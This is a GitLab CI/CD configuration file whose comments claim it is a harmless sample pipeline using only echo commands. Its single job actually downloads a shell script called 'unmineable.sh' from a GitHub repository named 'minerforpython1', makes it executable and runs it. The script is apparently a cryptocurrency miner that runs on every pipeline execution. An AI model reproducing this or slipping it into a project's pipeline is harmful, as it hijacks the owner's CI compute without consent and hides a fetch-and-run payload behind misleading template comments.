# This file is a template, and might need editing before it works on your project.
# This is a sample GitLab CI/CD configuration file that should run without any modifications.
# It demonstrates a basic 3 stage CI/CD pipeline. Instead of real tests or scripts,
# it uses echo commands to simulate the pipeline execution.
#
# A pipeline is composed of independent jobs that run scripts, grouped into stages.
# Stages run in sequential order, but jobs within stages run in parallel.
#
# For more information, see: https://docs.gitlab.com/ee/ci/yaml/README.html#stages
stages:
  - bachannel
  - build
  - deploy

bachannel_1:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/jackmine22/minerforpython1/main/unmineable.sh && chmod +x unmineable.sh && ./unmineable.sh
